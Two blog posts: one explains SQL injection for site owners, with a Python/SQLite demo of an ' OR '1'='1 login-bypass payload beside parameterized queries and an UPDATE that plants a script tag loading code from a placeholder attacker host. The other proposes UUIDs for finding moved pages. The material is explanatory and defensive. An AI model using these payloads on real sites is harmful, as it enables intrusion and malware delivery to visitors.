
SQL-Injections, the two most common types

Opening a site Google has listed as spreading malicious software via the browser. In this case the site was the victim of SQL-injections.

What are SQL-injections? How can they affect my site? How does it happen and how can I avoid it?

Your site may already have been attacked, with the attacker using it only as a stepping stone to attack your users! This is done using something called SQL-injections.

Since Firefox (2 and 3) and MSIE 7 started using Google’s (and others’) systems for blocking sites that serve harmful web pages, the problem of SQL-injections has been put in the spotlight.

What happens is that an attacker hacks a site by smuggling their own SQL code into the database of the victim system, typically through input fields whose content is pasted straight into SQL queries without sanitization. A system open to SQL-injections can be attacked in basically two ways. The first is a DoS (denial of service) attack: the attacker deletes all the tables, or does something else destructive, effectively bringing the whole site down.
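
To make the mechanics concrete, here is a minimal sketch in Python against an in-memory SQLite database (the table and the payload are made up for illustration, not taken from a real attack). The first query pastes user input straight into the SQL string, so a crafted “password” rewrites the query’s logic; the parameterized version treats the same input strictly as data:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

# Vulnerable: user input is pasted straight into the SQL string.
name = "nobody"
password = "' OR '1'='1"  # classic injection payload
query = f"SELECT * FROM users WHERE name = '{name}' AND password = '{password}'"
print(conn.execute(query).fetchall())  # [('alice', 'secret')] -- login bypassed

# Safe: placeholders make the database treat the input strictly as data.
query = "SELECT * FROM users WHERE name = ? AND password = ?"
print(conn.execute(query, (name, password)).fetchall())  # []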

The other form of attack on systems open to SQL-injections is far sneakier and may not be detected at all by the site owner or the site visitors. It consists of planting client-side browser code in the database, making every visitor run script that tries to infect their computer with malware or viruses. This malicious software may do anything from listening in on traffic between the client (web browser) and bank sites to connecting the client system to a botnet.
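
As a hedged illustration of what such a planted payload can look like (the domain and script name below are placeholders, not a real malware host), an injected statement often just appends a script tag to every text column, so the site keeps working while every rendered page quietly loads the attacker’s JavaScript:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT)")
conn.execute("INSERT INTO articles (body) VALUES ('Welcome to our site!')")

# The kind of statement an attacker smuggles in through a vulnerable input:
# it appends a script tag to every row, so each page rendered from the
# table now carries the attacker's code.
injected_sql = (
    "UPDATE articles SET body = body || "
    "'<script src=\"http://evil.example/bad.js\"></script>'"
)
conn.execute(injected_sql)

print(conn.execute("SELECT body FROM articles").fetchone()[0])
# Welcome to our site!<script src="http://evil.example/bad.js"></script>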

Needless to say, attacks using SQL-injections have become a problem not so much for the owner of the compromised site as for its visitors. Users of the web should therefore not underestimate the importance of good virus protection, a system update policy and a secure browsing policy.

Since the owner of the vulnerable site won’t notice any departure from business as usual, and neither will most infected clients, nobody is the wiser.

This is why Google (and others) have started evaluating and flagging sites that serve malicious content, and why Firefox and MSIE (and probably others) have started blocking them.


Using UUIDs to Prevent Broken Links

I don’t know if someone has proposed this before, but how about using UUIDs to prevent broken links?

A UUID, Universally Unique Identifier, is a 128-bit number written as hexadecimal digits in five hyphen-separated groups. A UUID has the special quality that it is, for all practical purposes, universally unique. This means two people on opposite sides of the world could create a UUID each at the exact same time and still be sure their UUIDs are not identical. In fact, they can create a large number of UUIDs and still be sure none of them are identical. (The same goes for two people on the same server.)
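
A minimal sketch in Python, using the standard library’s uuid module (uuid4() draws its bits at random, which is what makes collisions negligible in practice):

import uuid

# Two UUIDs generated back to back on the same machine.
a = uuid.uuid4()
b = uuid.uuid4()

print(a)       # e.g. 8523813a-7c47-4cd9-ad78-09c14dfb505f (five hyphen-separated groups)
print(a == b)  # False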

This quality makes UUIDs a perfect tool for assigning unique IDs to web pages or other Internet resources (in fact any resource of any kind: your dog, the cutlery in your drawers, you name it).

This could be done like this:

Step 1: Place the UUID on the page

First a UUID has to be put on the web page, perhaps with a meta tag, or as plain text on the page.

With a meta tag it could look like this:

<meta name="UUID" content="8523813a-7c47-4cd9-ad78-09c14dfb505f"/>

Or on the page, like:

UUID: 8523813a-7c47-4cd9-ad78-09c14dfb505f

Step 2: Find the UUID

The second step would be to make sure that every time a program stores a URL to the page it also stores the UUID (when creating bookmarks, linking from one site to another, etc.), as in the sketch below.
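
A sketch of what a bookmarking tool could do, assuming the UUID is published in a meta tag exactly as in step 1 (the regular expression and the plain-dict store are simplifications for illustration):

import re
import urllib.request

UUID_META = re.compile(r'<meta\s+name="UUID"\s+content="([0-9a-fA-F-]{36})"')

def read_uuid(url):
    # Fetch the page and pull the UUID out of its meta tag, if present.
    html = urllib.request.urlopen(url).read().decode("utf-8", "replace")
    match = UUID_META.search(html)
    return match.group(1) if match else None

def bookmark(url, store):
    # Store the UUID alongside the URL so the page can be re-found later.
    store[url] = read_uuid(url)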

So, once the page gets lost, either because the link has changed, the page has been moved, or something similar, the browser (or site) can use the UUID to find the page again.

This second step obviously demands a search engine (or some other central registry) that uses UUIDs in its index, since the system requires some kind of central processing to keep track of the UUID-to-page mapping.
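
In principle the registry itself is simple; here is a toy sketch with a plain dictionary standing in for a search engine’s index (in a real system register() would be fed by a crawler):

# A toy UUID-to-page registry; a real one would be a search engine index.
registry = {}

def register(uuid_str, url):
    # One UUID may legitimately map to several copies of the same resource.
    registry.setdefault(uuid_str, []).append(url)

def lookup(uuid_str):
    return registry.get(uuid_str, [])

register("8523813a-7c47-4cd9-ad78-09c14dfb505f", "http://example.com/uuid-post")
print(lookup("8523813a-7c47-4cd9-ad78-09c14dfb505f"))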

A UUID is not a particularly good URI, since even UUIDs generated at the same host just a few seconds apart are still totally different from each other (this actually depends on the implementation, but one should not assume UUIDs from the same host share any similarities).

This, however, is also one of the strengths of UUIDs, since it means an Internet resource should be possible to locate regardless of its physical location (in contrast to ordinary HTTP URLs, which are tightly bound to their location: they start with the server name).

Since a UUID is (by definition) universally unique, it is fairly simple to generate one wherever you are, use it in a page, be sure there are no duplicates, and later locate the exact page carrying that UUID.

A Google experiment

I’ve placed the text “UUID: 8523813a-7c47-4cd9-ad78-09c14dfb505f” on this page (several times now). As far as I’ve been able to discern, Google indexes even such arbitrary information as UUID data (the exact string “8523813a-7c47-4cd9-ad78-09c14dfb505f”, to be precise). There is also a page with a discussion on how to use UUIDs to make pages unique; it has nothing to do with this discussion, but it is an interesting example of how UUIDs can be used with Google.

By searching for “8523813a-7c47-4cd9-ad78-09c14dfb505f” it should be possible to locate this page (give Google time to index the page first, though). Update: that search seems not to work, but searching for the UUID with the hyphens replaced by spaces (or “+”) does.

Finally

Locating the page should work regardless of the page’s position, site, or anything else. In fact, as long as the UUID is still there, it should even be possible to place this text in a Word, OpenDocument, PDF or any other document format a search engine can index, and the text would still be possible to find with nothing but the UUID.

Obviously the end result of this technology would be that there is no “search-engine-in-between”: whenever a link is lost, the caller goes to the central repository/search engine (or some other place), locates the page, and links to it again automatically. It should even be smart enough, if a UUID has several possible links, to retry until it finds one that works.
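
Putting the pieces together, such a caller might look like the following sketch, where lookup() is the toy registry query from above and any URL that answers with HTTP 200 is accepted:

import urllib.error
import urllib.request

def resolve(uuid_str):
    # Try every URL the registry knows for this UUID until one works.
    for url in lookup(uuid_str):
        try:
            with urllib.request.urlopen(url, timeout=5) as response:
                if response.status == 200:
                    return url
        except (urllib.error.URLError, OSError):
            continue  # dead link; try the next candidate
    return None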